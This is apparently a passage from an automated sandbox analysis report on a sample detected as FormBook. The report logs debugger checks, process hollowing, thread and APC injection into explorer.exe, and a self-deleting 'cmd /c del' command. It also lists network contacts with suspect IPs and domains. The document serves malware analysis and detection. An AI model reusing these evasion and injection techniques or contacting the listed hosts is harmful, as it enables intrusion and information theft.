          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FFDE2 mov eax, dword ptr fs:[00000030h]11_2_048FFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FFDE2 mov eax, dword ptr fs:[00000030h]11_2_048FFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048E8DF1 mov eax, dword ptr fs:[00000030h]11_2_048E8DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04908D34 mov eax, dword ptr fs:[00000030h]11_2_04908D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04843D34 mov eax, dword ptr fs:[00000030h]11_2_04843D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483AD30 mov eax, dword ptr fs:[00000030h]11_2_0483AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FE539 mov eax, dword ptr fs:[00000030h]11_2_048FE539
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048BA537 mov eax, dword ptr fs:[00000030h]11_2_048BA537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04864D3B mov eax, dword ptr fs:[00000030h]11_2_04864D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04864D3B mov eax, dword ptr fs:[00000030h]11_2_04864D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04864D3B mov eax, dword ptr fs:[00000030h]11_2_04864D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04873D43 mov eax, dword ptr fs:[00000030h]11_2_04873D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B3540 mov eax, dword ptr fs:[00000030h]11_2_048B3540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04857D50 mov eax, dword ptr fs:[00000030h]11_2_04857D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485C577 mov eax, dword ptr fs:[00000030h]11_2_0485C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485C577 mov eax, dword ptr fs:[00000030h]11_2_0485C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CFE87 mov eax, dword ptr fs:[00000030h]11_2_048CFE87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B46A7 mov eax, dword ptr fs:[00000030h]11_2_048B46A7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04900EA5 mov eax, dword ptr fs:[00000030h]11_2_04900EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04900EA5 mov eax, dword ptr fs:[00000030h]11_2_04900EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04900EA5 mov eax, dword ptr fs:[00000030h]11_2_04900EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04878EC7 mov eax, dword ptr fs:[00000030h]11_2_04878EC7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04908ED6 mov eax, dword ptr fs:[00000030h]11_2_04908ED6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048636CC mov eax, dword ptr fs:[00000030h]11_2_048636CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048EFEC0 mov eax, dword ptr fs:[00000030h]11_2_048EFEC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048616E0 mov ecx, dword ptr fs:[00000030h]11_2_048616E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048476E2 mov eax, dword ptr fs:[00000030h]11_2_048476E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483C600 mov eax, dword ptr fs:[00000030h]11_2_0483C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483C600 mov eax, dword ptr fs:[00000030h]11_2_0483C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483C600 mov eax, dword ptr fs:[00000030h]11_2_0483C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04868E00 mov eax, dword ptr fs:[00000030h]11_2_04868E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F1608 mov eax, dword ptr fs:[00000030h]11_2_048F1608
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A61C mov eax, dword ptr fs:[00000030h]11_2_0486A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A61C mov eax, dword ptr fs:[00000030h]11_2_0486A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483E620 mov eax, dword ptr fs:[00000030h]11_2_0483E620
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048EFE3F mov eax, dword ptr fs:[00000030h]11_2_048EFE3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04847E41 mov eax, dword ptr fs:[00000030h]11_2_04847E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FAE44 mov eax, dword ptr fs:[00000030h]11_2_048FAE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FAE44 mov eax, dword ptr fs:[00000030h]11_2_048FAE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484766D mov eax, dword ptr fs:[00000030h]11_2_0484766D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485AE73 mov eax, dword ptr fs:[00000030h]11_2_0485AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04848794 mov eax, dword ptr fs:[00000030h]11_2_04848794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7794 mov eax, dword ptr fs:[00000030h]11_2_048B7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7794 mov eax, dword ptr fs:[00000030h]11_2_048B7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7794 mov eax, dword ptr fs:[00000030h]11_2_048B7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048737F5 mov eax, dword ptr fs:[00000030h]11_2_048737F5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A70E mov eax, dword ptr fs:[00000030h]11_2_0486A70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A70E mov eax, dword ptr fs:[00000030h]11_2_0486A70E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485F716 mov eax, dword ptr fs:[00000030h]11_2_0485F716
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CFF10 mov eax, dword ptr fs:[00000030h]11_2_048CFF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CFF10 mov eax, dword ptr fs:[00000030h]11_2_048CFF10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490070D mov eax, dword ptr fs:[00000030h]11_2_0490070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0490070D mov eax, dword ptr fs:[00000030h]11_2_0490070D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04834F2E mov eax, dword ptr fs:[00000030h]11_2_04834F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04834F2E mov eax, dword ptr fs:[00000030h]11_2_04834F2E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486E730 mov eax, dword ptr fs:[00000030h]11_2_0486E730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484EF40 mov eax, dword ptr fs:[00000030h]11_2_0484EF40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484FF60 mov eax, dword ptr fs:[00000030h]11_2_0484FF60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04908F6A mov eax, dword ptr fs:[00000030h]11_2_04908F6A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04839080 mov eax, dword ptr fs:[00000030h]11_2_04839080
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B3884 mov eax, dword ptr fs:[00000030h]11_2_048B3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B3884 mov eax, dword ptr fs:[00000030h]11_2_048B3884
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A0 mov eax, dword ptr fs:[00000030h]11_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048790AF mov eax, dword ptr fs:[00000030h]11_2_048790AF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486F0BF mov ecx, dword ptr fs:[00000030h]11_2_0486F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486F0BF mov eax, dword ptr fs:[00000030h]11_2_0486F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486F0BF mov eax, dword ptr fs:[00000030h]11_2_0486F0BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov ecx, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048CB8D0 mov eax, dword ptr fs:[00000030h]11_2_048CB8D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048358EC mov eax, dword ptr fs:[00000030h]11_2_048358EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04904015 mov eax, dword ptr fs:[00000030h]11_2_04904015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04904015 mov eax, dword ptr fs:[00000030h]11_2_04904015
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7016 mov eax, dword ptr fs:[00000030h]11_2_048B7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7016 mov eax, dword ptr fs:[00000030h]11_2_048B7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B7016 mov eax, dword ptr fs:[00000030h]11_2_048B7016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486002D mov eax, dword ptr fs:[00000030h]11_2_0486002D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484B02A mov eax, dword ptr fs:[00000030h]11_2_0484B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484B02A mov eax, dword ptr fs:[00000030h]11_2_0484B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484B02A mov eax, dword ptr fs:[00000030h]11_2_0484B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484B02A mov eax, dword ptr fs:[00000030h]11_2_0484B02A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04850050 mov eax, dword ptr fs:[00000030h]11_2_04850050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04850050 mov eax, dword ptr fs:[00000030h]11_2_04850050
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04901074 mov eax, dword ptr fs:[00000030h]11_2_04901074
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F2073 mov eax, dword ptr fs:[00000030h]11_2_048F2073
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486A185 mov eax, dword ptr fs:[00000030h]11_2_0486A185
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485C182 mov eax, dword ptr fs:[00000030h]11_2_0485C182
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862990 mov eax, dword ptr fs:[00000030h]11_2_04862990
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048661A0 mov eax, dword ptr fs:[00000030h]11_2_048661A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048661A0 mov eax, dword ptr fs:[00000030h]11_2_048661A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B69A6 mov eax, dword ptr fs:[00000030h]11_2_048B69A6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B51BE mov eax, dword ptr fs:[00000030h]11_2_048B51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B51BE mov eax, dword ptr fs:[00000030h]11_2_048B51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B51BE mov eax, dword ptr fs:[00000030h]11_2_048B51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048B51BE mov eax, dword ptr fs:[00000030h]11_2_048B51BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483B1E1 mov eax, dword ptr fs:[00000030h]11_2_0483B1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483B1E1 mov eax, dword ptr fs:[00000030h]11_2_0483B1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483B1E1 mov eax, dword ptr fs:[00000030h]11_2_0483B1E1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048C41E8 mov eax, dword ptr fs:[00000030h]11_2_048C41E8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04839100 mov eax, dword ptr fs:[00000030h]11_2_04839100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04839100 mov eax, dword ptr fs:[00000030h]11_2_04839100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04839100 mov eax, dword ptr fs:[00000030h]11_2_04839100
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04854120 mov eax, dword ptr fs:[00000030h]11_2_04854120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04854120 mov eax, dword ptr fs:[00000030h]11_2_04854120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04854120 mov eax, dword ptr fs:[00000030h]11_2_04854120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04854120 mov eax, dword ptr fs:[00000030h]11_2_04854120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04854120 mov ecx, dword ptr fs:[00000030h]11_2_04854120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486513A mov eax, dword ptr fs:[00000030h]11_2_0486513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486513A mov eax, dword ptr fs:[00000030h]11_2_0486513A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485B944 mov eax, dword ptr fs:[00000030h]11_2_0485B944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485B944 mov eax, dword ptr fs:[00000030h]11_2_0485B944
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483C962 mov eax, dword ptr fs:[00000030h]11_2_0483C962
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483B171 mov eax, dword ptr fs:[00000030h]11_2_0483B171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483B171 mov eax, dword ptr fs:[00000030h]11_2_0483B171
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486D294 mov eax, dword ptr fs:[00000030h]11_2_0486D294
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486D294 mov eax, dword ptr fs:[00000030h]11_2_0486D294
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]11_2_048352A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]11_2_048352A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]11_2_048352A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]11_2_048352A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048352A5 mov eax, dword ptr fs:[00000030h]11_2_048352A5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484AAB0 mov eax, dword ptr fs:[00000030h]11_2_0484AAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484AAB0 mov eax, dword ptr fs:[00000030h]11_2_0484AAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486FAB0 mov eax, dword ptr fs:[00000030h]11_2_0486FAB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862ACB mov eax, dword ptr fs:[00000030h]11_2_04862ACB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04862AE4 mov eax, dword ptr fs:[00000030h]11_2_04862AE4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04848A0A mov eax, dword ptr fs:[00000030h]11_2_04848A0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04835210 mov eax, dword ptr fs:[00000030h]11_2_04835210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04835210 mov ecx, dword ptr fs:[00000030h]11_2_04835210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04835210 mov eax, dword ptr fs:[00000030h]11_2_04835210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04835210 mov eax, dword ptr fs:[00000030h]11_2_04835210
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483AA16 mov eax, dword ptr fs:[00000030h]11_2_0483AA16
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483AA16 mov eax, dword ptr fs:[00000030h]11_2_0483AA16
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04853A1C mov eax, dword ptr fs:[00000030h]11_2_04853A1C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04874A2C mov eax, dword ptr fs:[00000030h]11_2_04874A2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04874A2C mov eax, dword ptr fs:[00000030h]11_2_04874A2C
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F60F1 GetProcessHeap,0_2_002F60F1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F171B SetUnhandledExceptionFilter,0_2_002F171B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F3D62 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002F3D62
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F19E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002F19E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F15CD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002F15CD
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_002F3D62 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_002F3D62
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_002F19E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_002F19E2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_002F15CD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_002F15CD
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_002F171B SetUnhandledExceptionFilter,2_2_002F171B

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.58.78.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 103.88.34.80 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ejsuniqueclasses.com
          Source: C:\Windows\explorer.exeDomain query: www.856380062.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.74.106.237 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 163.123.204.26 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 164.68.104.58 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.466se.com
          Source: C:\Windows\explorer.exeDomain query: www.circusocks.com
          Source: C:\Windows\explorer.exeDomain query: www.healthpragency.com
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeSection loaded: unknown target: C:\Users\user\Desktop\mvui1vY6Mo.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 1250000Jump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeProcess created: C:\Users\user\Desktop\mvui1vY6Mo.exe 'C:\Users\user\Desktop\mvui1vY6Mo.exe' Jump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.694405409.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.694780872.0000000001080000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915643403.0000000003260000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.675806448.0000000005E50000.00000004.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915643403.0000000003260000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.694780872.0000000001080000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915643403.0000000003260000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.694780872.0000000001080000.00000002.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915643403.0000000003260000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.680948462.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F182B cpuid 0_2_002F182B
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F14B5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_002F14B5

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
